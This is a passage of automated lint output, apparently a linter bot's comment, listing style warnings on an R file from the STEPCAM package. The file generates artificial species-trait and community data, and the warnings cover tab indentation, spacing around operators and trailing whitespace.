tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for (j in 1:n_traits) {\n^\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for (k in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:44:48:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L44) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:46:17:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for (j in 1:n_traits) {\n                ^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:47:19:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for (k in 1:pool_richness) {\n                  ^\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:48:25:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:48:28:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L48) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:48:31:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:48:36:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:44:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n^\n```\n[R/generateArtificialData.R:52:31:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:52:65:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                              traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:53:30:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:53:49:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:55:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n^\n```\n[R/generateArtificialData.R:55:16:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L55) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L56) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n^\n```\n[R/generateArtificialData.R:56:43:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                         ~^~~\n```\n[R/generateArtificialData.R:56:71:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * \n                                                                      ^\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:59:27:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                         ~^~~\n```\n[R/generateArtificialData.R:59:31:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L59) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                              ^\n```\n[R/generateArtificialData.R:59:51:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - \n                                                  ^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:60:63:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       max(trait_distances_onedimen)) + 10 ^ -99\n                                                              ^~\n```\n[R/generateArtificialData.R:61:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L61) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:61:29:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n^\n```\n[R/generateArtificialData.R:64:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L64) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:67:11:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L67) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n          ^\n```\n[R/generateArtificialData.R:67:58:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L67) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) {\n                                                        ~^~~\n```\n[R/generateArtificialData.R:68:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L68) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) { \n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/cf3877f957829f6888f3371b20fb8cd1a752e9eb/R/generateArtificialData.R#L71) *style:* **Use two spaces to indent, never 